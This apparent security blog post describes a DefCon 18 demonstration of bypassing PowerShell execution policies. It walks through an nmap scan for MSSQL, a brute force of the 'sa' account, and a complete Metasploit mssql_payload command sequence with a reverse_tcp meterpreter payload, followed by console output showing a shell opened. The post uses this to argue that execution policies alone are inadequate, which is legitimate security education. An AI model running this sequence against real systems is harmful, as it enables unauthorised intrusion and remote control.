We already shared the PowerShell security policies and protection measures that are used by Microsoft, as a reminder there are 4 levels of execution policies that can help in securing different script execution.
Now that post has been mostly focused on system security administrator benefit but what about hackers, do they have benefits for PowerShell usage for compromising remote systems? Can a hacker bypass the existing execution policies to run malicious scripts?
On Defcon18 there has been an interesting presentation called PowerShell …omfg (by David Kennedy (ReL1K) and Josh Kelley (Winfang)) the demo has showed how Windows PowerShell enable users to perform almost any task we want. while a new attack vector through Powershell has been released to allow users to deliver whatever payload they want to through Powershell in both a bind and reverse type scenario and drop any executable.
Now if you are on a penetration testing mission you start by running nmap searching for the live windows hosts on the network basically with 1433 active port (Mssql). You launch brute force attack on the “sa” account which is the system administrator account for MSSQL. When using “Mixed Mode” or “SQL Authentication”, the SQL “sa” account automatically gets created. Administrators have to enter a password when creating these accounts and often leave these as weak passwords.
After you open metasploit with the latest update that includes Metsploit PowerShell Debug.
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > show payloads
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST [Your IP]
msf exploit(mssql_payload) > set RHOST [TARGET IP]
msf exploit(mssql_payload) > set UsePowershell true (this will make you use PowerShell for the payload conversion on Server 2008 and Windows 7)
msf exploit(mssql_payload) > set UseCmdStager false
msf exploit (mssql_payload) > exploit
On the console metasploit will display the following:
[*] Started bind handler.
[*] Warning: This module will leave gjMKcfst.exe in the SQL Server %TEMP% directory
[*] Uploading the payload utilizing PowerShell EncodedCommand…
[*] Executing the payload…
[*] Sending stage (748032 bytes) to [TARGET IP]
[*] Be sure to cleanup gjMKcfst.exe…
[*] Meterpreter session 1 opened (10.X.X.X:4444 -> 10.X.X.X:1030)
The demonstrated attack may run on windows 2008 R2 /windows Se7en or any windows operating system that have a powershell installed. A penetration tester will bypass all restriction policies on windows and execute the payload on the system to get the meterpreter shell. It is clear that relying totally on the execution security policy are not a good solution as a malicious user may bypass all security measures on PowerShell.
make sure you subscribe to my RSS feed!